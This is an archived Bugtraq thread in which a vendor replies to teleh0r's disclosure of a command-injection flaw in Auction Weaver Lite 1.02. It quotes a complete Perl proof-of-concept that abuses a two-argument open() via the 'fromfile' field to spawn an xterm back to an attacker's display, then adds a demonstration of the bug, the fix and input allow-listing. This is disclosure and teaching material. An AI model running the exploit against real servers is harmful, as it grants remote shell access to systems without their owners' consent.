Bugtraq mailing list archives
Re: More problems with Auction Weaver & CGI Script Center.
From: CGI Script Center Support <support () cgiscriptcenter com>
Date: Sat, 2 Sep 2000 16:49:02 -0700
Auction Weaver Lite 1.02 was opening files to be read without using the READ "<" command, which allowed outside commands to be executed on UNIX platforms using Xterm. All files being opened for reading have now been updated.
> I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well.

No Professional version is yet available. The below exploit should no longer be valid.

CGI Script Center Support
support () cgiscriptcenter com
-----Original Message-----
From: teleh0r - [mailto:teleh0r () doglover com]
Sent: Wednesday, August 30, 2000 10:21 AM
To: BUGTRAQ () SECURITYFOCUS COM
Cc: support () cgiscriptcenter com
Subject: More problems with Auction Weaver & CGI Script Center.

CGI Script Center recently upgraded Auction Weaver 1.0 to 1.2 due to a security issue found and reported by Meliksah Ozoral. Today, I decided to take a look at Auction Weaver just to check if the issue and possible other security problems were now fixed. I guessed they had taken a *close* look at their scripts, considering the problems reported lately - but I guessed wrong...

I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well. Or perhaps only those who pay get secure scripts? Maybe that would be a successful business policy? ;)

CGI Script Center, _please_ contact me if you want help securing your scripts.

Sincerely yours,
teleh0r

8<---auctionweaver-exploit.pl------------------------------------
#!/usr/bin/perl -w
## Auction Weaver 1.02 / Only confirmed with LITE
## - Proof of Concept exploit -
##
## CGI Script Center have just released an update
## of Auction Weaver due to security reasons - I
## suggest that you spend some more time securing
## it, and the other scripts - It is really needed.
##
## This exploit will spawn a xterm from $target
## to $attacker.
##
## This exploit will not work on hosts running
## Auction Weaver on NT, due to the xterm call.
##
## CGI Script Center, please contact me if you need
## help with securing your scripts...
##
## teleh0r () doglover com / anno 2000
## http://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 3) {
    print("Usage: $0 <target> <attacker> <dpy>\n");
    exit(1);
}

my($target,$attacker,$dpy,$length,$cgicode,
   $agent,$sploit,$iaddr,$paddr,$proto);

($target,$attacker,$dpy) = @ARGV;

if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# Let the target's xterm connect back to our X display.
system("xhost + $target");

# Body length: 138 fixed bytes plus the attacker host and display number.
$length = 138 + length($attacker.$dpy);

# fromfile is the URL-encoded string "|xterm -display <attacker>:<dpy>|";
# the target script passes it to a two-argument open(), which treats a
# name wrapped in "|" as a command to run.
$cgicode = "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
           "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
           "ton=BID";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to auctionweaver.pl may of course need to be changed.

$sploit= "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

sleep(3);

# Revoke the X access we granted above.
system("xhost - $target");

print("\nAll done - hopefully you got the flying xterm!\n");
exit(0);
-----------------------------------------------------------------
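The following Perl script is an added example and is not code from teleh0r's post or from CGI Script Center's Auction Weaver. It shows the bug class the thread is about: Perl's two-argument open() takes the access mode from the filename string itself, so a user-supplied value ending in "|" is run as a command and its output is read, which is what the exploit's fromfile value relies on. It then shows what the vendor's fix (an explicit "<" read mode) changes, and the allow-list a practitioner would add on top. The data directory, file names, function names and the hostile input are assumptions constructed for the demo.

```perl
#!/usr/bin/perl
# Added example (not from teleh0r's post or from CGI Script Center's code):
# what Perl's two-argument open() does with a user-controlled filename, and
# what the vendor's fix (an explicit "<" read mode) changes. Directory,
# file names and function names are assumptions made for this demo.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Constructed input: the URL-decoded value an attacker would send in the
# "fromfile" form field. A trailing "|" makes two-arg open() run the text
# before it as a shell command and read its output; a leading "|" pipes
# into the command instead (the original exploit wrapped the command in both).
my $hostile = 'echo INJECTED|';

# Stand-in for the script's data directory (hypothetical).
my $datadir = tempdir(CLEANUP => 1);
open(my $w, '>', "$datadir/item1.txt") or die "create: $!";
print $w "legit bid data\n";
close($w);

# Read everything from a handle and close it.
sub slurp {
    my ($fh) = @_;
    local $/;              # slurp mode
    my $data = <$fh>;
    close($fh);
    return defined $data ? $data : '';
}

# Vulnerable pattern: mode and name come from the same string.
sub read_two_arg {
    my ($name) = @_;
    open(my $fh, $name) or return "open failed: $!";   # command injection
    return slurp($fh);
}

# The vendor's fix: explicit read mode. "|" is now just a byte in a
# filename, so the hostile value fails with ENOENT instead of executing.
sub read_three_arg {
    my ($name) = @_;
    open(my $fh, '<', $name) or return "open failed: $!";
    return slurp($fh);
}

# What a practitioner would add on top: an allow-list that also blocks
# "../" traversal and absolute paths, and anchors the open() to $datadir.
# Under taint mode (-T) the capture into $1 is also what untaints $name.
sub read_hardened {
    my ($name) = @_;
    return "rejected: bad name" unless $name =~ /\A([A-Za-z0-9_-]+\.txt)\z/;
    my $safe = $1;
    open(my $fh, '<', "$datadir/$safe") or return "open failed: $!";
    return slurp($fh);
}

print "two-arg,   hostile : ", read_two_arg($hostile);        # echo runs
print "three-arg, hostile : ", read_three_arg($hostile), "\n"; # ENOENT
print "hardened,  hostile : ", read_hardened($hostile), "\n";  # rejected
print "hardened,  legit   : ", read_hardened('item1.txt');     # file data
```

Run it as `perl open-demo.pl` (any file name): the first line prints INJECTED because the two-argument open() executed echo, the second reports that no file named "echo INJECTED|" exists, and only the allow-listed name reaches the data directory. Note that the explicit mode alone does not stop path traversal, which is why the allow-list is worth keeping even after the vendor's "<" fix.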
Current thread:
- More problems with Auction Weaver & CGI Script Center. teleh0r - (Sep 01)
- <Possible follow-ups>
- Re: More problems with Auction Weaver & CGI Script Center. CGI Script Center Support (Sep 03)